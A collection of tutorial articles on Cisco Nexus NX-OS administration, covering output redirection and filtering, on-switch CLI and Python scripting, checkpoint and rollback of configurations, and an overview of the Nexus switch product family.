Redirecting ‘Show’ Command Output to File With or Without Timestamp – ‘show running-config > backupcfg.$(TIMESTAMP)’

The ability to redirect the output of a command to a file is a feature most Linux users/administrators will welcome. Capturing lengthy outputs from commands such as show tech-support can be quite challenging as these can sometimes be over 10,000 lines. Redirecting the output of a command to a file is a very simple process, making it easy to perform even for less experienced users.

The command below shows how to redirect the output of the show running-config command to a file on the system’s flash:

N5k-UP# show running-config > backupcfg
N5k-UP# dir | include backup
4352 May 15 13:30:00 2023 backupcfg

When adding the System-Defined Timestamp Variable into the command line the Nexus OS will automatically append the time and date to the filename making it easier to store and track files. The next example redirects the show running-config output to a file that includes the system’s timestamp:

N5k-UP# show running-config > backupcfg.$(TIMESTAMP)
N5k-UP# dir | include backup
4352 May 15 13:30:00 2023 backupcfg
4352 May 15 13:46:17 2023 backupcfg.2023-05-15-13.46.17

Combining Multiple Search Strings – ‘| Include’ Parameter

Sometimes, it is necessary to combine search strings from the show command to filter the output and quickly obtain the information we need. The | include parameter is frequently used to filter the output and display lines containing specific keywords.

The next command shows the configured descriptions of all interfaces together with the interface utilization, which is captured by the rate keyword:

N5k-UP# show interface | include description|rate
1 minute input rate 0 bits/sec, 0 packets/sec
1 minute output rate 0 bits/sec, 0 packets/sec
30 seconds input rate 56 bits/sec, 0 packets/sec
30 seconds output rate 896 bits/sec, 1 packets/sec
input rate 56 bps, 0 pps; output rate 896 bps, 1 pps
300 seconds input rate 112 bits/sec, 0 packets/sec
300 seconds output rate 488 bits/sec, 1 packets/sec
input rate 112 bps, 0 pps; output rate 488 bps, 1 pps
30 seconds input rate 120 bits/sec, 0 packets/sec
30 seconds output rate 1072 bits/sec, 1 packets/sec
..<output omitted>

Note that the search strings are case sensitive and that there are no spaces around the pipe separating the keywords (description|rate).
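
If case sensitivity gets in the way, the grep operator on most NX-OS releases also accepts an ignore-case option. The line below is an illustrative sketch; check the ‘| grep ?’ help on your platform before relying on it:

N5k-UP# show interface | grep ignore-case description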

The next example command is equivalent to an OR filter:

N5k-UP# show run | include 'interface Vlan|ip address'
ip tacacs source-interface Vlan1
source-interface Vlan1
ip address 10.1.1.101/24
interface Vlan1
ip address 192.168.250.247/24
interface Vlan4
ip address 192.168.4.247/24
interface Vlan7
ip address 172.20.199.247/24
interface Vlan11
interface Vlan25
ip address 192.168.25.247/24
interface Vlan26
ip address 172.26.1.251/24
interface Vlan27
ip address 172.27.1.250/24
interface Vlan60
interface Vlan100
ip address 172.20.100.247/24
interface Vlan105
ip address 172.20.105.247/24
interface Vlan109
ip address 172.20.109.247/24
interface Vlan110
ip address 172.20.110.247/24

Finally, the last example is used when more than one word is needed to filter specific keywords/patterns. The search string should be enclosed between apostrophes as shown below:

N5k-UP# show running-config | include 'ip route'
ip route 0.0.0.0/0 192.168.245.245
ip route 0.0.0.0/0 192.168.231.4
ip route 0.0.0.0/0 172.26.1.250
ip route 0.0.0.0/0 10.1.1.1

Scripting in NX-OS – Executing Multiple Commands within a File

Automating time-consuming tasks such as configuring multiple interfaces or changing large portions of a configuration is easily achieved thanks to the flexibility the NX-OS provides.

Here are a few examples where automated scripts can be used to help speed up troubleshooting or even resolve problems:

  • Temporarily change the running configuration, obtain debugs and then roll back the change
  • Have a series of commands ready to be executed when specific events occur e.g. link failure or switch becomes unresponsive
  • Execute commands on the Nexus after the switch is deployed at a remote location
  • Periodically obtain information from the Nexus switch using show commands.

The possibilities and combinations are really limitless.

Unfortunately the script containing the commands cannot be created within NX-OS. The script needs to be created on a workstation using a standard text editor and then uploaded to the Nexus switch bootflash.

Uploading the file to the Nexus bootflash is achieved using the copy tftp: bootflash: command. This assumes there is already a tftp server configured, operating and serving the script:

N5k-UP# copy tftp: bootflash:
Enter source filename: nexus-script.txt
Enter vrf (If no input, current vrf 'default' is considered): management
Enter hostname for the tftp server: 10.10.8.176
Trying to connect to tftp server......
Connection to Server Established.
TFTP get operation was successful
Copy complete, now saving to disk (please wait)...

N5k-UP# dir | include nexus
179 May 15 00:03:12 2023 nexus-script.txt
N5k-UP#

The script’s content can be viewed using the show file command as displayed below:

N5k-UP# show file bootflash:///nexus-script.txt
Configure terminal
interface Ethernet1/6
description *** TEST 1 ***
no shutdown
interface Ethernet1/7
description *** TEST 2 ***
no shutdown
interface Ethernet1/8
description *** TEST 3 ***
no shutdown
end

As we can see, the script contains commands that will configure the description on 3 Ethernet interfaces and place them in an administratively up status (no shutdown).  Currently these interfaces do not have any configuration:

N5k-UP# show run interface
!Command: show running-config interface
!Time: Mon May 15 00:00:41 2023
version 7.0(2)N1(1)
<…>
interface Ethernet1/6
interface Ethernet1/7
interface Ethernet1/8

Our script can easily be executed using the run-script command, which runs the commands specified in a file:

N5k-UP# run-script bootflash:///nexus-script.txt
`configure terminal
`interface Ethernet1/6
`description *** TEST 1 ***
`no shutdown
`interface Ethernet1/7
`description *** TEST 2 ***
`no shutdown

`interface Ethernet1/8
`description *** TEST 3 ***
`no shutdown
`end

Once the script is executed we can check the running-configuration and verify interfaces have been successfully configured:

N5k-UP# show running-config interface
!Command: show running-config interface
!Time: Mon May 15 00:04:04 2023
version 7.0(2)N1(1)
<output omitted>..
interface Ethernet1/6
description *** TEST 1 ***
no shutdown
interface Ethernet1/7
description *** TEST 2 ***
no shutdown
interface Ethernet1/8
description *** TEST 3 ***
no shutdown

Another option is to use the vsh command to run commands directly. vsh stands for virtual shell and is mainly used to run NX-OS CLI commands from the Bash shell; however, we can also run the same script by taking advantage of the vsh command.

Below, the script is piped to vsh on a clean configuration and the interface descriptions are successfully configured:

N5k-UP# show file script-description2.txt | vsh

N5k-UP# show run interface
!Command: show running-config interface
!Time: Mon May 15 10:49:16 2023
<…>
interface Ethernet1/6
description *** TEST 1 ***
interface Ethernet1/7
description *** TEST 2 ***
interface Ethernet1/8
description *** TEST 3 ***

There is also the option to execute commands directly as illustrated in the following example.

N5k-UP# echo "hostname TEST-VSH" | vsh
TEST-VSH#

Introducing Python in the Nexus NX-OS – Uploading and Executing Python Scripts

Nexus switches offer powerful scripting capabilities thanks to the integration of Python into NX-OS, which can simplify network operations by allowing Python scripts to run directly on the switch. Python is a powerful programming language with a simple approach to object-oriented programming. The Cisco Nexus 5000 series switches with Release 5.2(1)N1(1) and later and the Cisco Nexus 6000 series switches with Release 6.0(2)N1(1) and later support all the features available in Python v2.7.2. The Cisco Nexus 7000 series also supports Python v2.7.2 and the Cisco Nexus 9000 series devices support Python v2.7.5. Python scripts can be used to execute configuration commands and show commands, parse CLI output, call other scripts, etc.

To enter the Python environment on the Nexus NX-OS use the python command. Once in the Python environment the command prompt changes to include three greater-than signs (>>>). At this point we are able to directly execute Python commands and scripts.

N5k-UP# python
Copyright (c) 2001-2012 Python Software Foundation; All Rights Reserved
N5k-UP# >>>

The integrated Python in NX-OS supports both interactive and non-interactive modes. In interactive mode, Python commands can be executed after switching to the Python environment. The next interactive-mode example illustrates how to print the programming world’s old-time classic, the “hello world” output, directly from the NX-OS Python environment.

N5k-UP# python
Copyright (c) 2001-2012 Python Software Foundation; All Rights Reserved

N5k-UP# >>>print "hello world"
hello world
N5k-UP# >>> exit()
N5k-UP# 

Note: The following commands can be used to exit the Python environment and switch back to the NX-OS privileged mode (#): quit(), exit(), Ctrl-C or Ctrl-D (i.e. EOF)

Python in NX-OS can also run in non-interactive (script) mode by passing the Python script name as an argument to the python CLI command.

For demonstration purposes we’ve created a simple Python script named helloPython.py. The script was created with a standard text editor, e.g. Notepad on Windows, uploaded to a TFTP server and then downloaded to the Nexus switch and stored in the bootflash:scripts location, which is where Python scripts must be stored and executed from. The content of our Python script is shown below:

N5k-UP# show file bootflash:scripts/helloPython.py
#!/usr/bin/env python
import sys
argvList = sys.argv[1:]
for argv in argvList:
    print 'Hello ' + argv

Executing Python Scripts

The Python script is executed using the source <filename> command followed by the parameters the script expects. The script expects one or more arguments (argv); each argument (here, firewall.cx) is printed after the word “Hello”:

N5k-UP# source helloPython.py firewall.cx
Hello firewall.cx

NOTE: On NX-OS releases prior to 7.0, Python scripts are executed with the ‘python’ command instead of the ‘source’ command.
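
For instance, on an older release the same script would be run as follows (an illustrative sketch using the same hypothetical script and argument):

N5k-UP# python bootflash:scripts/helloPython.py firewall.cx
Hello firewall.cx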

Finally, you can create your own NX-OS commands by taking advantage of Python scripting. Below, a new command named hello is configured using the cli alias command, which executes our Python script along with the necessary parameters:

N5k-UP(config)# cli alias name hello source helloPython.py
N5k-UP(config)# hello Vasilis
Hello Vasilis

The cli alias command above instructs the NX-OS to create a new command named hello which, when executed, will in turn run the command “source helloPython.py” and pass along any parameters given (for our Python script). The cli alias command is covered extensively later in this article.
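
Beyond printing arguments, Python scripts on the Nexus can also execute show commands and parse their output. The exact Python module differs between platforms and releases (newer images expose a cli module while older Nexus 5000/7000 code uses a cisco package, and the return format varies), so treat the following as an illustrative sketch only, assuming ‘from cli import cli’ is available and returns the command output as a string:

#!/usr/bin/env python
# Illustrative sketch - assumes the 'cli' Python module is available on this NX-OS release
from cli import cli

# Collect the interface summary and print only the lines reporting a down state
output = cli('show interface brief')
for line in output.split('\n'):
    if 'down' in line:
        print line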

Nexus NX-OS Hints & Tips

Working with the Nexus NX-OS is a pleasant experience considering its similarities with the Linux operating system; Unix/Linux users will surely feel right at home. To further enhance the user experience, we’ve put together the top 5 handy NX-OS commands below that can be useful for the day-to-day operation and administration of Nexus switches. Let’s start the countdown...

Nexus NX-OS Tip No.5 – Executing Multiple Commands in One Line

The Nexus NX-OS allows the execution of multiple show or configuration commands in one go by placing the semi-colon (;) character between them:

N5k-UP# show clock ; show checkpoint summary ; show hostname ;
12:56:57.370 UTC Mon May 15 2023
User Checkpoint Summary
--------------------------------------------------------------------------------
1) FIRST-Checkpoint:
Created by admin
Created at Wed, 16:13:19 10 May 2023
Size is 15,831 bytes
Description: None
2) SLA:
Created by admin
Created at Sun, 14:21:06 14 May 2023
Size is 16,183 bytes
Description: PYTHON-SCRIPT
N5k-UP

N5k-UP# configure terminal ; interface eth1/6 ; description *** test multiple commands *** ;
Enter configuration commands, one per line. End with CNTL/Z.
N5k-UP(config-if)# show run interface ethernet 1/6
!Command: show running-config interface Ethernet1/6
!Time: Mon May 15 12:58:46 2023
version 7.0(2)N1(1)
interface Ethernet1/6
description *** test multiple commands *** ;

Nexus NX-OS Tip No.4 – Tracking Recent User Configuration Changes

All commands executed within the Nexus NX-OS are logged by default. You can easily find who modified the configuration and when, as well as the exact commands that have been applied using the show accounting log command:

N5k-UP(config-if)# show accounting log | last 3
Mon May 15 13:05:12 2023:type=update:id=10.10.8.174@pts/2:user=admin:cmd=configure terminal ; interface Ethernet1/6 ; description test (REDIRECT))
Mon May 15 13:05:12 2023:type=update:id=10.10.8.174@pts/2:user=admin:cmd=configure terminal ; interface Ethernet1/6 ; description test (SUCCESS)
Mon May 15 13:05:16 2023:type=start:id=vsh.9446:user=admin:cmd=

The | last 3 parameter will display the last 3 entries. 

Nexus NX-OS Tip No.3 – Creating Your Own NX-OS Alias Commands

Creating your own NX-OS alias commands is a great feature that helps simplify long and tedious commands. Cisco IOS users can also use the cli alias command to create IOS-equivalent commands. For example, we can create an alias named wr for the copy running-config startup-config command, to help users with more experience on Cisco IOS devices work more easily on the Nexus switch.

Several useful examples are provided below:

N5k-UP(config)# cli alias name ipb show ip interface brief
N5k-UP(config)# cli alias name is show interface status
N5k-UP(config)# cli alias name hb show hsrp brief
N5k-UP(config)# cli alias name ps show port-channel summary
N5k-UP(config)# cli alias name wr copy running-config startup-config

N5k-UP(config)# wr
[########################################] 100%
Copy complete, now saving to disk (please wait)...

Nexus NX-OS Tip No.2 – Quickly Viewing and Executing Past Commands

The Nexus NX-OS allows users to easily view and recall past commands with the show cli history command. When entered, the switch lists the commands entered from the oldest to the most recent (indicated by the number on the left) along with the time each was executed. A past command can then be re-executed by typing an exclamation mark (!) followed by the number of the command line.

In the example below we selected command No.9 from the history list by entering !9:

N5k-UP# show cli history
0 13:18:30 conf
<output omitted>
8 13:20:59 cli alias name id show interface description
9 13:21:04 show run | include alias
10 13:23:06 show cli alias

N5k-UP# !9
N5k-UP# show run | include alias
cli alias name sla source routetrack-1.3.py 8.8.8.8/32 management 10.10.8.176
cli alias name hello source helloPython.py
cli alias name ipb show ip interface brief
cli alias name is show interface status
cli alias name hb show hsrp brief
cli alias name ps show port-channel summary
cli alias name wr copy running-config startup-config
N5k-UP#

Nexus NX-OS Tip No.1 – Comparing Differences in Running & Startup Configuration 

You can compare the output of a show command with the output from a previous invocation of the same command. In particular, the Cisco NX-OS software creates temporary files holding the most recent output of each show command for all current and previous user sessions.

The “show run diff” command can be used to display the difference between running and startup configuration.  The section starting with *** (stars) refers to the Startup-config while the section under --- (dashes) refers to the Running-config.

Note: The switch will not show any differences in the configuration after it is saved.

N5k-UP# show run diff
*** Startup-config
--- Running-config
***************

*** 46,56 ****
interface Ethernet1/2
interface Ethernet1/3
interface Ethernet1/4
! description GREP2
interface Ethernet1/5
interface Ethernet1/6
description test

--- 45,55 ----
interface Ethernet1/2
interface Ethernet1/3
interface Ethernet1/4
! description *** TEST DIFF ***
interface Ethernet1/5
interface Ethernet1/6

N5k-UP# wr
[########################################] 100%
Copy complete, now saving to disk (please wait)...
N5k-UP# show run diff
N5k-UP#

The diff-clean command can be used to remove the temporary files for the current user's active session or for all past and present sessions for all users.

N5k-UP# diff-clean all-sessions
N5k-UP#

Summary

The Cisco NX-OS Software is a data center-class operating system with powerful scripting capabilities. This article showed how to make use of various Nexus NX-OS command options and operators, combine multiple Nexus commands, filter show command output, and create and execute NX-OS scripts. It also introduced the Python environment and Python scripting, and covered a number of Nexus NX-OS hints and tips to help administrators and engineers make their day-to-day operation and administration of Nexus data center switches faster, easier and safer!

Complete Guide to Nexus Checkpoint & Rollback Feature

Complete Guide to Nexus Checkpoint & Rollback Feature. Fast Recovery from Nexus Misconfiguration. Nexus 9000, 7000, 5000, 3000

The Cisco NX-OS checkpoint feature provides the capability to capture, at any time, a snapshot (backup) of the Cisco Nexus configuration before making any changes. The captured configuration (checkpoint) can then be used to roll back and restore the original configuration.

The NX-OS checkpoint and rollback feature is extremely useful, and a life saver in some cases, when a new configuration change to a production system has caused unwanted effects or was incorrectly made/planned and we need to immediately return to an original/stable configuration.

With Catalyst IOS switches we would manually remove or restore IOS commands, but with the Nexus NX-OS checkpoint-rollback feature this is a much faster and safer process that can be executed even by an authorized user with basic experience/knowledge of Nexus switches.


Finally, we must point out that basic knowledge of the Cisco NX-OS is required for this article.


NX-OS Checkpoint & Rollback Limitations - Guidelines

The Checkpoint and Rollback feature has the following main configuration guidelines and limitations:

  • The maximum number of checkpoints supported is equal to ten (10).
  • Checkpoints are stored in an internal repository not accessible by the common user.
  • Checkpoints are persistent and synced between redundant supervisors.
  • It is not possible to apply or import the checkpoint file from another Nexus switch. Checkpoints can only be used on the device they were created on.
  • Only one user at a time can perform a checkpoint, rollback, or copy of the running configuration to the startup configuration.
  • Checkpoints are cleared from the system’s database after executing the write erase or reload command (switch reload).
  • Checkpoints can be manually cleared by running the clear checkpoint database command. The checkpoints saved to the bootflash are not affected by the aforementioned commands.
  • Checkpoints are only local to the NX-OS switch.
  • Rollback using files stored in bootflash is supported only if it has been created using the checkpoint command.
  • Checkpoint names must be unique. You cannot overwrite previously saved checkpoints. If attempting to overwrite existing checkpoints the user will receive the following error: ERROR: ascii-cfg: Checkpoint Name already exists (err id 0x405F002B)
  • Checkpoints are local to a virtual device context (VDC) for the Nexus 7000.
  • Rollback is not supported in the storage VDC for the Nexus 7000
  • Rollback is not supported on the Nexus 5000 after enabling the FCoE feature. System will generate the following error after enabling the FCoE feature: ERROR: FCOE is enabled. Disabling rollback module.

Understanding and Configuring the NX-OS Checkpoint Feature

Working with the Nexus Checkpoint feature is a very easy process and the commands used follow a logical order allowing the easy usage of this fantastic feature.

It’s important to always create a checkpoint before you begin making changes to the existing configuration of your Nexus switch. The command below shows the creation of our first checkpoint named Checkpoint-1 along with the optional description parameter (max 80 characters) allowing the easy identification of the checkpoint:

N5k-UP(config)# checkpoint Checkpoint-1 description *** Testing the checkpoint feature ***
.....Done

Once the checkpoint has been created, we can easily confirm its creation and details by issuing the show checkpoint summary command as shown below:

N5k-UP(config)# show checkpoint summary
User Checkpoint Summary
--------------------------------------------------------------------------------
1) Checkpoint-1:
Created by admin
Created at Mon, 08:10:29 22 May 2023
Size is 15,568 bytes
Description: *** Testing the checkpoint feature ***

Note how the system not only provides all the necessary details about the recently created checkpoint but also shows which system user created it (admin). This detail is particularly important if the system is managed by multiple admins or engineers.

The NX-OS checkpoint feature doesn’t stop there. Users can configure their Nexus switch to automatically generate checkpoints when specific changes occur in its running configuration. This capability minimizes the risk of network downtime due to misconfiguration of key NX-OS features and helps ensure there is always a valid snapshot to roll back to in case someone forgot to create a checkpoint before applying their changes!

The feature also allows the system to automatically create a checkpoint when a configured expiration period, e.g. the 120-day trial grace period of a license, has been exceeded. Reasons that can trigger automated system checkpoints are highlighted below:

  • License expiration of a feature
  • Disabling a feature with the no feature command
  • Removing an instance of a Layer 3 protocol

The system-generated checkpoint naming convention has the format system-fm-<feature>. To illustrate this automated behaviour we disabled the VRRP feature on our Nexus 5000, triggering the system to create a checkpoint. First we confirm the VRRP feature is enabled by issuing the show feature | include vrrp command, then disable it and finally verify the new system checkpoint:

N5k-UP(config)# show feature | include vrrp
vrrp 1 enabled
N5k-UP(config)# no feature vrrp
N5k-UP(config)# show feature | include vrrp
vrrp 1 disabled

N5k-UP# show checkpoint summary
User Checkpoint Summary
--------------------------------------------------------------------------------
1) Checkpoint-1:
Created by admin
Created at Mon, 08:10:29 22 May 2023
Size is 15,568 bytes
Description: *** Testing the checkpoint feature ***
System Checkpoint Summary
--------------------------------------------------------------------------------
2) system-fm-vrrp:
Created by admin
Created at Mon, 11:31:41 22 May 2023
Size is 15,581 bytes
Description: Created by Feature Manager.

Notice that the system now shows a second checkpoint system-fm-vrrp which did not previously exist. This second checkpoint was created automatically by the Nexus as soon as we disabled the vrrp feature.

Multiple checkpoints can be created to save different versions of the running configuration, however as previously noted, there is a limit of ten (10) checkpoints a user can create. When this limit is reached a warning message to overwrite the oldest checkpoint is shown:

N5k-UP# checkpoint Checkpoint-11
Checkpoints limit reached, this will overwrite the oldest checkpoint,
Continue? (y/n) [n]

How to Backup Nexus Checkpoints – Exceeding The 10 Checkpoint Limit 

Those who require the ability to store more than 10 checkpoints can store checkpoint files in the bootflash (internal compact flash memory). This is a useful methodology to safely store checkpoint files as they won’t be erased with the write erase command or reboot of the Nexus switch.

To store a checkpoint to the bootflash simply use the checkpoint file bootflash: command and append the name to be used for the checkpoint file:

N5k-UP# checkpoint file bootflash:Checkpoint-11
.Done
N5k-UP# dir | grep 11
15568 May 22 11:54:53 2023 Checkpoint-11

The user and system checkpoint database can be manually cleared using the clear checkpoint database command. However, the checkpoint files stored at the bootflash are not affected by the clear checkpoint database command as displayed below:

N5k-UP# clear checkpoint database
...Done
N5k-UP# show checkpoint summary
N5k-UP#
N5k-UP# dir | grep 11
15568 May 22 11:54:53 2023 Checkpoint-11

Rollback Configuration – Checking Differences Between ‘Running Config’ & ‘CheckPoint’

The rollback feature allows us to apply a checkpoint backup configuration of the Cisco NX-OS switch at any point without having to reload the switch. When executed, rollback will compare the running-configuration with the checkpoint and make the necessary changes to the running configuration so that they become identical. Network-admin user privileges are required to configure rollback.

To test the rollback feature on our Nexus 5000 we created a checkpoint (Checkpoint-1) and then configured a description on interfaces E1/10-E1/14. We will then roll back to the initial checkpoint (Checkpoint-1), which should remove the descriptions from interfaces E1/10-E1/14:

N5k-UP(config)# interface ethernet 1/10-14
N5k-UP(config-if-range)# description *** TESTING CHECKPOINT FEATURE ***

We can review the differences between the running-config and a checkpoint before applying the rollback command by executing the show diff command. It is always recommended to use the show diff command and review the configuration changes before applying the checkpoint configuration file:

N5k-UP(config)# show diff rollback-patch running-config checkpoint Checkpoint-1
Collecting Running-Config
#Generating Rollback Patch
!!
interface Ethernet1/14
no description *** TESTING CHECKPOINT FEATURE ***
exit
interface Ethernet1/13
no description *** TESTING CHECKPOINT FEATURE ***
exit
interface Ethernet1/12
no description *** TESTING CHECKPOINT FEATURE ***
exit
interface Ethernet1/11
no description *** TESTING CHECKPOINT FEATURE ***
exit
interface Ethernet1/10
no description *** TESTING CHECKPOINT FEATURE ***
exit

The following rollback command options are provided on the Nexus 5000, Nexus 7000 and Nexus 9000 Series:

  • Atomic: This is the default rollback type and applies the rollback file only if no errors occur
  • Verbose: This option displays the execution log and allows the user to see the applied configuration

N5k-UP(config)# rollback running-config checkpoint Checkpoint-1 ?
<CR>
atomic Stop rollback and revert to original configuration (default)
verbose Show the execution log

In addition, the Nexus 7000 and Nexus 9000 Series support the following extra rollback options:

  • Best-effort: Implement a rollback and skip any errors
  • Stop-at-first-failure: Implement a rollback that stops if an error occurs

The Nexus 3000 supports only the atomic rollback option.

Finally, the rollback is applied using the verbose option so we can follow the execution log…

N5k-UP(config)# rollback running-config checkpoint Checkpoint-1 verbose
Collecting Running-Config
Generating Rollback patch for switch profile
Rollback Patch is Empty
Note: Applying config parallelly may fail Rollback verification
Collecting Running-Config
#Generating Rollback Patch
Executing Rollback Patch
========================================================
`config t `
`interface Ethernet1/14 `
`no description *** TESTING CHECKPOINT FEATURE *** `
`exit`
`interface Ethernet1/13 `
`no description *** TESTING CHECKPOINT FEATURE *** `
`exit`
`interface Ethernet1/12 `
`no description *** TESTING CHECKPOINT FEATURE *** `
`exit`
`interface Ethernet1/11 `
`no description *** TESTING CHECKPOINT FEATURE *** `
`exit`
`interface Ethernet1/10 `
`no description *** TESTING CHECKPOINT FEATURE *** `
`exit`
========================================================
Generating Running-config for verification
Generating Patch for verification

At this point it seems like the rollback to the selected checkpoint was successful. We can verify this by checking to see if there is any description on Ethernet interfaces 1/10-14:

N5k-UP# sh interface ethernet 1/10-14 | include description
N5k-UP#

The rollback configuration test has been completed successfully.

Finally, to rollback using a checkpoint file located in the system’s bootflash we simply specify its location as shown below:

N5k-UP# rollback running-config file bootflash:///Checkpoint-11

Summary

This article serves as a configuration guide for the Nexus NX-OS checkpoint and rollback feature. We covered the main limitations and guidelines of this powerful NX-OS feature, demonstrated how to use checkpoint & rollback, and showed how to save checkpoints so they are not lost during a switch reboot or write erase. Finally, it is recommended that the configuration rollback procedure be used for managing change controls and not as a long-term configuration management solution.

Introduction to Cisco Nexus Switches

Introduction to Cisco Nexus Switches – Nexus Product Family. Differences Between Nexus NX-OS & Catalyst IOS. Comparing High-End Nexus & Catalyst Switches

This article introduces the Cisco Nexus product family (Nexus 9000, Nexus 7000, Nexus 5000, Nexus 3000, Nexus 2000, Nexus 1000V and MDS 9000). We explain the differences between Nexus and Catalyst switches and also compare commands, naming conventions, hardware capabilities etc. between the Nexus NX-OS and Catalyst IOS operating systems. To provide a comprehensive overview we explain where each Nexus model is best positioned in the data center and directly compare high-end Nexus switches (Nexus 9000/7000) with high-end Catalyst switches (Catalyst 6800/6500), examining specifications, bandwidth – capacity, modules and features (High Availability, Port Scalability, VDC, vPC – VSS, OTV, VXLAN, etc.).

For our readers’ convenience we have made over 90 different datasheets available for free download in our Cisco Data Center download section.


Cisco Nexus Product Family

The Cisco Nexus Family of products has become extremely popular in small and large data centers thanks to their capability for unifying storage, data and networking services. Thanks to the Cisco Fabric Interconnect they are able not only to support all these services but also provide a rock-solid programmable platform that fully supports any virtualized environment.  The Cisco Nexus family includes a generous number of different Nexus models to meet the demands of any Data Center environment. Let’s take a look at what the Nexus Family has to offer!

The Nexus Product Family

Cisco Nexus 9000 Series Switches

These data center switches can operate in Cisco NX-OS Software or Application Centric Infrastructure (ACI) mode. The main features of the Cisco Nexus 9000 Series are support for Fabric Extender Technology (FEX), virtual Port Channel (vPC) and Virtual Extensible LAN (VXLAN). There are a few key differences between the Cisco Nexus 7000 and Nexus 9000 DC switches: the Nexus 9000 supports Application Centric Infrastructure (ACI), in contrast to the Nexus 7000 switches; however, the Nexus 9000 switches do not support the VDC (Virtual Device Context) technology of the Nexus 7000, and the Nexus 9000 Series doesn't support storage protocols, again in contrast to the Nexus 7000. Finally, it is foreseen that the Nexus 9000 will complement the Nexus 7000 as data centers transition to ACI.

The Nexus 9000 Series Data Center Switches

The Nexus 9000 switches are available in a variety of models and configurations starting from the Nexus 9200 series (1 RU) Cloud Scale - standalone, Nexus 9300 series (1RU), Nexus 9300-EX (1RU) Cloud Scale standalone/ACI, Nexus 9500-EX (1RU) Cloud Scale Modules to the Nexus 9500 Cloud Scale switches (4, 8, 16 slots).

You can compare all available models at the following URL:

https://www.cisco.com/c/en/us/products/switches/nexus-9000-series-switches/models-comparison.html

Download complete data sheets: Nexus 9500 series, Nexus 9300-EX series, Nexus 9300 series and Nexus 9200 series

Cisco Nexus 7000 Series Switches

The Nexus 7000 Series can provide an end-to-end data center architecture on a single platform, including the data center core, aggregation and access layers. The N7K series provides high-density 10, 40 and 100 Gigabit Ethernet interfaces. The main features of the Cisco Nexus 7000 Series are support for FEX, virtual Port Channel (vPC), VDC, MPLS and FabricPath. In addition, the N7K supports fairly robust and established technologies for multi-DC interconnect (DCI) such as OTV and LISP. The N9K does not support these well-established DCI technologies, but supports a newer DCI approach, VXLAN with BGP EVPN, that can be deployed for site-to-site DCI.

The Nexus 7000 Series Data Center Switches

The Nexus 7000 series consists of the 7000 and 7700 series switches, the latter being an updated series to the original 7000 series. The Nexus 7700 series offers higher bandwidth per slot (1.3Tbps compared to 550Gbps), greater performance and ability to support up to an impressive 192 100GE ports (7700 – 18 slot) compared to 96 100GE ports (7000 – 18 slot).

The Nexus 7000 is offered in 4, 9, 10 and 18 slot models while the 7700 comes in 2, 6, 10 and 18 slot models.

You can compare all available models at the following URL:

https://www.cisco.com/c/en/us/products/switches/nexus-7000-series-switches/models-comparison.html

Download complete data sheets: Nexus 7700 series or Nexus 7000 series

Cisco Nexus 5000 Series Switches

This product line is ideal for the DC access layer (End of Row), providing architectural support for virtualization and Unified Fabric environments. The Cisco Nexus 5000 Series (N5k) supports VXLAN and comprehensive Layer 2 and 3 features for scaling data center networking. It supports native Fibre Channel, Ethernet and FCoE interfaces. The default system software includes most Cisco Nexus 5000 platform features, such as Layer 2 security and management features. Licensed features include Layer 3 routing, IP multicast and enhanced Layer 2 (Cisco FabricPath).

The Nexus 5000 Series Data Center Switches

The Nexus 5000 series switches are available in two platforms: 10 Gbps and 40 Gbps. The 5600 Series 10 Gbps platform is capable of delivering up to 2.56 Tbps switching capacity while the 5600 Series 40 Gbps platform can squeeze up to an impressive 7.68 Tbps.

All units except the Nexus 5696Q (40 Gbps) occupy between 1 and 2 RUs space whereas the Nexus 5696Q requires a generous 4 RU of rack space.

Full comparison of all available models can be found here: https://www.cisco.com/c/en/us/products/switches/nexus-5000-series-switches/index.html - Note the 5000 series Nexus switches are now End-of-Sales / End-of-Support.

Download complete data sheets: Nexus 5500 series or Nexus 5600 series

Cisco Nexus 3000 Series Switches

This product family offers features such as latency of less than a microsecond, line-rate Layer 2 & 3 unicast/multicast switching, and support for 40 Gigabit Ethernet interfaces. The Cisco Nexus 3000 Series switches are positioned for environments with ultra-low latency requirements such as financial High-Frequency Trading (HFT), High-Performance Computing (HPC) and automotive crash-test simulation applications.

The Nexus 3000 Series Data Center Switches

The Cisco Nexus 3000 platform offers more than 15 models to satisfy all the switching needs an organization might have. The Nexus 3000 series starts with 1GE ports (Nexus 3000) and scales all the way up to 32 x 100GE ports with the Nexus 3232C model. Environments sensitive to delays will surely benefit from this series as it has been designed to practically eliminate switching latency while offering large buffer space per port. Some models also have the ability to monitor their own latency.

Full comparison can be found here: https://www.cisco.com/c/en/us/products/switches/nexus-3000-series-switches/models-comparison.html#~nexus3500

Download complete data sheets: Nexus 3000 series

Cisco Nexus 2000 Series Switches 

These integrate into existing data center networking infrastructures as well as the Cisco ACI setup. The Cisco Nexus 2000 Series (N2k) utilizes FEX technology to provide flexible data center deployment models and to meet the growing server demands. This series is a flexible and low cost solution to add access and server ports to a data center. The parent switch of an N2k switch can be a Nexus 5000, Nexus 7000 or Nexus 9000 series switch. With FEX technology deployed, all the configuration and management is performed on the parent switch. In particular the N2k, with FEX technology, acts as a remote line card of the parent switches.
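
As a brief, hedged illustration of this model, a fabric extender is typically brought up entirely from the parent switch; the parent interface and FEX number below are hypothetical:

N5K (config)# feature fex
N5K (config)# interface Ethernet1/1
N5K (config-if)# switchport mode fex-fabric
N5K (config-if)# fex associate 100

Once the FEX is online, its host ports appear on the parent switch (for example as Ethernet100/1/1) and are configured there, exactly like a remote line card.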

The Nexus 2000 series switches

The Cisco Nexus 2000 platform offers over 10 models starting with a 24-port 1GE (Nexus 2224TP) all the way up to 48-port 1/10GE SFP/SFP+ (Nexus 2300).

Download complete data sheets: Nexus 2000 series

Cisco Nexus 1000v Series Switches

The Cisco Nexus 1000V Series (N1KV) is a software-based switch. It operates inside the VMware ESX hypervisor and utilizes the NX-OS Software. The Nexus 1000v architecture has two components: the Virtual Ethernet Module (VEM) and the Virtual Supervisor Module (VSM). These two components together make up the Cisco Nexus 1000V Series Switch, with the VSM providing the management plane and the VEM providing the data plane.

It should be noted that the Nexus 1000V Essential license is available at no cost and can provide various Layer 2 networking features.

Download complete data sheets: Nexus 1000v series

Cisco MDS 9000 SAN Switches

Cisco MDS 9000 Series Multilayer Switches are used to support Data Center SAN infrastructure. This series offers director-class platforms and Fabric switches. It utilizes the Cisco NX-OS software. Finally, the MDS 9000 can offer native fibre channel, storage services, and FCoE.

Download complete data sheets: MDS 9000 series

The Nexus Operating System – NX-OS Software

The Cisco NX-OS Software is a data center-class operating system that is built with modularity, resilience, and serviceability as its foundation. It is ideal for implementation within mission-critical data center environments where reliability and fault tolerance are very important. 

